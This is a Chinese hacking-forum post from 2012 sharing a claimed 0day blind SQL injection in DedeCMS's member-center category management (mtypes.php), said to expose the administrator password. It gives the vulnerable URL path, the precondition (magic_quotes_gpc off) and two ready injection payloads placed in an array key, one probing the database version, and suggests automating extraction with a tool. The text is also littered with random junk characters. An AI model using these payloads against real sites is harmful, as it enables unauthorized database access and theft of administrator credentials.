找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2235|回复: 0
打印 上一主题 下一主题

DedeCMS会员中心分类管理SQL注射0day漏洞可获得管理员密码

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:08:09 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
需要magic_quotes_gpc = Off,所以说是鸡肋啊., L3 X- s$ R& D* o+ P

8 R6 k- R' t1 t
4 j1 O% W& {0 V6 Z/ w0 h1 b发生在数组key里的注射漏洞,有点意思.: ~: U) }- `# n% d4 ^' y2 H  M" U
) ?  f' U5 `$ H3 J* z" H
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
9 b* m$ |$ n$ l/ M: D  }
% {( F0 f; J, O  D5 r/ M! W% z4 F  g; J3 Whttp://www.xxx.com /dede/member/mtypes.php?dopost=save
. ?4 P& n! S& n9 }9 h 6 o* Q7 u8 o% e& {1 D# i: D7 M
exploit:
! [; S3 N/ g9 {0 `3 Y. fmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r. }# S7 F' A6 L8 f- n! w" K
mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r& M! f' }0 j  ~; g% t
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表